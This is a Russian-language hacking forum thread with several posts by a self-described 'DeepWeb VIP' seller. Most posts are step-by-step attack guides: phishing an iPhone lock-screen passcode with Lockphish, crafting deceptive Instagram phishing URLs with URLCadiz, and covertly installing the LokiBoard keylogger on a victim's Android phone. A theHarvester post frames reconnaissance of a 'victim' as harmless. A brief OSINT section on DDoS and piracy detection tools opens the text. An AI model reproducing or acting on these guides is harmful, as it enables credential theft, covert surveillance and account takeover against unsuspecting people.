  3. NetFlow Analyzer: этот инструмент может отслеживать сетевой трафик и выявлять потенциальные DDoS-атаки.
  4. Wireshark: анализатор сетевых протоколов может внализировать трафик, указывающий на DDoS-атаку.
  5. Black Lotus Labs: платформа для анализа угроз, которая предоставляет информацию о DDoS-атаках и других киберугрозах.
Кража интеллектуальной собственности и пиратство




Пиратство - кража защищенных авторским правом или запатентованных материалов и интеллектуальной собственности. Пользователи могут использовать ниже указанные инструменты для выявления пиратского контента:

  1. Оповещения Google: инструмент для отслеживания в Интернете упоминаний определенных ключевых слов, включая названия брендов или продуктов. Может быть полезно для выявления случаев нарушения прав на товарный знак или авторских прав.
  2. TinEye: Инструмент обратного поиска картинок позволяет пользователям выявлять случаи кражи изображений, загружая их или вводя URL-адрес.
  3. Инструменты для борьбы с пиратством: существует несколько инструментов для борьбы с пиратством, позволяющих отслеживать и блокировать незаконные загрузки материалов, защищенных авторским правом. Например, DMCA.com и Copyright Alliance.
Заключение

OSINT играет важную роль в расследовании киберпреступлений, включая фишинговые атаки, онлайн-мошенничество, кражу личных данных, атаки вредоносных программ и многое другое. Используя вышеуказанные инструменты и методы, пользователи могут собирать и анализировать данные из различных онлайн-источников. Таким образом, при правильном подходе и грамотном использовании инструментов OSINT-расследования могут смягчить или даже предотвратить негативные последствия киберугроз.​
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Фишинг с Lockphish: как взломать пароль на iPhone






Вступить в наш чат​

IOS по праву считается самой защищенной мобильной операционной системой. А взлом пароля iPhone — один из самых востребованных запросов в поисковике, который интересует всех пользователей. Что ж, сегодня мы покажем вам один простой и неординарный способ взломать iPhone с помощью инструмента Lockphish.





Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.

Как работает взлом:

Для этого взлома мы будем использовать инструмент Lockphish и социальную инженерии. Мы отправим вредоносную ссылку, открыв её, жертва попадет на фишинговую страницу, которая будет выглядеть точно так же, как экран блокировки iPhone. Когда жертва разблокирует экран с помощью своего пароля, он будет перехвачен, и мы получим доступ к паролю. Жертва посчитает, что просто случайно заблокировала экран, хотя на самом деле это был взлом.

Как разблокировать iPhone с помощью Lockphish:
Шаг 1: Клонируйте Lockphish на свой Kali Linux с помощью следующей команды:

git clone [Only registered and activated users can see links. ]





Шаг 2: Теперь измените каталог на папку, как показано ниже:

cd lockphish





Шаг 3: Теперь запустите lock phish:

bash lockphish.sh

Шаг 4: Нажмите Enter, чтобы использовать ссылку YouTube по умолчанию, или укажите ссылку, на которую вы хотите перенаправить жертву, как показано ниже:





Шаг 5: Нажмите Enter, и вредоносная ссылка будет создана автоматически.





Шаг 6: Отправьте эту ссылку жертве. Вы также можете использовать инструмент сокращения URL-адресов, чтобы он не выглядел подозрительным.

Шаг 7: Жертва увидит обычный экран блокировки. Когда она введет пароль на поддельной странице, он будет отправлен вам.

Поздравляем! Теперь у вас есть доступ к паролю экрана блокировки жертвы.
Заключение:

Таким образом, в сегодняшней статье мы узнали, как можно использовать инструмент Lockphish для взлома пароля iPhone. Безусловно, этот метод требует определенных навыков социальной инженерии, но при правильном подходе и соблюдении всех шагов, вы сможете успешно выполнить взлом. На этом все. Удачи!
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Поиск информации с помощью Harvester





Вступить в наш чат

Сегодня мы расскажем вам об инструменте для сбора информации и тестировании на проникновение. Harvester (он же Харвестер — «жнец», «комбайн») — инструмент OSINT для получения информации об адресах электронной почты, поддоменах, именах сотрудников, открытых портах, баннерах и прочих данных о конкретном человеке или организации.
Уникальность заключается в том, что Harvester не использует никаких продвинутых алгоритмов для взлома паролей, тестирования брандмауэров или прослушивания данных в сетях. Вместо этого он автоматически собирает общедоступную информацию, доступную в Интернете: Яндекс, Google и Bing, а также соцсети LinkedIn, Twitter и Google+.








Зачем собирать общедоступную информацию, спросите вы?

Что ж, в любой задаче по хакингу первое, что вам нужно сделать, — это узнать свою цель. Чем больше у вас информации о цели, тем легче её взломать. Вы можете получить много полезной информации и использовать её для атак социальной инженерии.

Использование Харвестера
Этот инструмент предустановлен в Kali Linux, и его можно запустить с помощью следующей команды:

the harvester

В качестве примера можно использовать следующие параметры:

theharvester -d cvcc.edu -l 500 -b google -f myresults.html

В приведенном выше примере указан домен, где -l показывает лимит результатов, а -b указывает источник данных. Параметр -f экспортирует результаты в файл.

В инструменте также можно использовать следующие параметры:





d: имя домена или компании (в России часто прокатит только веб-адрес);
-b: источник данных; Harvester поддерживает целую кучу поисковиков и соцсетей (по его заверениям, впрочем). Среди них: bing, google, googleCSE, googleplus, google-profiles, linkedin, pgp, twitter, vhost, yandex, yahoo и куча всего, мало для нас пригодного; в командах Харвестера эти поисковики и соцсети так и подаются: со строчной буквы, без специальных символов;
-s: отсеивает ложные или пустые переходы в первых результатах выдачи (по умолчанию не активна — 0);
-v: проверяет имя хоста и ищет хосты виртуальные;
-f: сохранить результаты в документ форматов HTML и XML;
-n: проводит обратный DNS запрос по всем обнаруженным цепочкам адресов;
-c: попытается про-брутфорсить DNS с целью выявить реальное доменное имя;
-t: попытается развернуть весь путь до домена верхнего уровня;
-e: задать определённый DNS сервер;
-l: ограничит число результатов поиска, с которыми скрипт будет работать (не всегда чем тем лучше; PGP вообще эту опцию не понимает);
-h: попросит справку в SHODAN-сервисе по поводу зарегистрированных на этот адрес или ранее замеченных рядом хостов.


Прелесть подобных программ заключается в том, что их использование не несёт никаких последствий: ваше право узнавать о жертве максимум информации, при всём том, что эта информация собирается из открытых источников, где сам пользователь её и опубликовал.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0


Создаем фишинговые URL-адреса как профи







Социальная инженерия — одна из самых опасных техник в хакерском арсенале. В сочетании с фишингом хакеры могут легко взломать любое устройство. В интернет пространстве появляются все более и более продвинутые способы взлома, которые создают проблемы как для компаний, так и для обычных пользователей. Про один из таких передовых методов, который может сбить с толку даже профессионалов, мы сегодня и расскажем. Читайте дальше и вы узнаете, как хакеры создают поддельные URL-адреса известных сайтов с помощью инструмента URLCadiz.


Создаем фишинговые URL-адреса

Шаг 1
: Загрузите инструмент URLCadiz с помощью следующей команды в терминале Kali Linux:
Шаг 2: установите зависимости:
sudo pip3 install pyshorteners
Шаг 3: Измените каталог на папку и запустите инструмент с помощью следующей команды:
python3 URLCADIZ.py



Шаг 4: После запуска инструмента вы сможете выбрать любой URL-адрес из предложенных. В качестве примера мы возьмем Instagram.


Шаг 5: Далее введите адрес вашей поддельной фишинговой страницы.


Шаг 6: После вам необходимо ввести адрес, который увидит жертва. Убедитесь, что он достаточно длинный для объединения.



Шаг 7: Вот и все, теперь у вас есть фишинговый URL, как показано ниже:


Большинство пользователей не могут отличить этот URL от реального. Они выглядят настолько похожими, что почти все думают, что это на самом деле страница в Instagram.
На скриншоте ниже показано, как он выглядит в браузере:




Вот так хакеры взламывают Instagram и другие учетные записи социальных сетей с помощью фишинговых URL-адресов и социальной инженерии. Обязательно проверяйте URL-адреса, прежде чем переходить по каким-либо ссылкам. На этом все. Удачи!
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Что такое кейлоггер. Обзор бесплатного приложения для Android





На ряду с развитием кибербезопасности, совершенствуются и хакерские инструменты, обнаружить которые становится все труднее и труднее. Многие из них широко используются для взлома и других незаконных действий. Возможно, самым неприятным из этих инструментов является кейлоггер, разновидность вредоносного ПО, которое вам никак не захочется иметь на своем телефоне или компьютере.
Но что такое кейлоггер? Почему киберпреступники используют такие программы? Как установить кейлоггер? И есть ли способ обезопасить себя?



Что такое кейлоггер

Кейлоггер (Keylogger) — это программа, регистрирующая действия пользователя: нажатия клавиш на клавиатуре, движения и клики мышью и т.д. Кейлоггер или клавиатурный шпион позволяет хакерам получать любую конфиденциальную информацию из первоисточника.
Существует несколько способов заражения кейлоггерами:

  • Фишинг;
  • Файлы с непроверенных сайтов. Вредоносный код может встроиться в ПО или в ОС и начать перехват данных.
Как установить кейлоггер
Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несем ответственности за ваши действия.
Сейчас мы расскажем про совершенно бесплатный кейлоггер для Android под названием Loki Board. Это простое в использовании приложение, которое может записывать все нажатия на телефоне жертвы.
Шаг 1: Скачайте кейлоггер Lokiboard из Google Play.
Шаг 2: Установите приложение на целевое устройство.
Шаг 3: Откройте раздел «Язык и ввод» в настройках системы Android, как показано ниже:





Далее включите Lokiboard и отключите все другие формы ввода.
Шаг 4: Доступ к настройкам LokiBoard можно получить, коснувшись приложения в разделе «Язык и Ввод».
Существует множество параметров настройки, которые можно использовать для того, чтобы клавиатура выглядела так же, как и клавиатура Google.
Шаг 5: Как только жертва наберет текст на клавиатуре, журналы нажатий клавиш будут автоматически созданы. С помощью файлов вы можете легко получить доступ к украденным данным кейлоггера. Путь показан ниже:




Готово! Теперь ничто не ускользнёт от вашего взора.

Как очистить свое устройство от кейлоггера


  • Устанавливайте приложения только из плеймаркета. Благодаря этому ваш телефон станет намного безопаснее и надежнее;
  • Установите антивирус. Это повысит безопасность вашего телефона, а также поможет обнаружить и устранить шпионское ПО;
  • Если вы используете iPhone, и ваше устройство было взломано, то обновите его до более новой версии или вовсе переустановите ios;
  • Для установки шпионских приложений требуется либо физический доступ, либо невнимательность пользователя. Обязательно установите хороший пароль для вашего устройства, который не так-то просто взломать. Убедитесь, что вы не переходите по неизвестным ссылкам и не загружаете приложения из браузера;
  • Проведите чистку приложений с вашего устройства. Удалите все неизвестные приложения или те, которыми вы не пользуетесь;
  • И последнее, но не менее важное: перезагрузите устройство, если вы не можете удалить вирус или обнаружить шпионское ПО. Если ничего из вышеназванного не помогло, то попробуйте сделать резервную копию всех файлов, предварительно просканировав их антивирусом. Не создавайте резервные копии приложений. Сохраните только самое важное, а затем сбросьте устройство до заводских установок. Этот способ всегда работает.
А на этом все. Удачи!
 
Верх